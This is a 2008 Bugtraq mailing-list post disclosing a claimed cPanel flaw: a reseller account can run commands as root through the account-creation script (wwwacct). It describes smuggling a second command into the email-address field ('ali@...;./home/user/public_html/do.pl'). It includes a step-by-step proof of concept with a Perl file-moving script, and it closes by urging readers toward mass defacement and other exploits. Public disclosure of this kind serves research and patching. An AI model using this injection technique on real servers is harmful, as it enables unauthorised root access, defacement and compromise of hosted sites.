Date: 18 May 2008 14:45:04 -0000
From: a.jasbi@...oo.com
To: bugtraq@...urityfocus.com
Subject: Cpanel all version >> root access with a reseller account.

By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir
Vendor : Cpanel.net
Version : ALL !!
Risk : Very high
What u can do with this bug is :
u can have a access to all the server with reseller privilege (Th3 r00t)
how it's work ?
when u want to create an account in shell what will happen ?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
that u can run it with a web base program ! ( cpanel : doamin:2086)
example :
http://domain:2086/scripts/wwwacct  [domainname] [username] [password] [Email address] lab lab lab
it means you got a access to wwwacct in the scripts folder (Th3 r00t)
so u can run other command with root access like that
./scripts/wwwactt domain.com domain password ali@...kerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
that u can Likewise run it on  the web base program.what u need to do is just write ali@...kerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.
()()()()()()()()()()()()()
Test it:
++++++++++++++++++++++++++
Step 1

Save this file in /home/user/public_html/do.pl .
#!/usr/bin/perl
$old='/home/user/public_html/test.txt';
$new='/home/root/kon.txt';
rename $old, $new;
++++++++++++++++++++++++++
step 2 

make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
step 3

create an account and write ali@...kerz.ir;./home/user/public_html/do.pl in E-mail Address text box
then click on the "create" button.
Yes , you can find your file in /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
you can run your own code !(mass defacer, exploit's or everything that u want).
Enjoy it...

Powered by blists - more mailing lists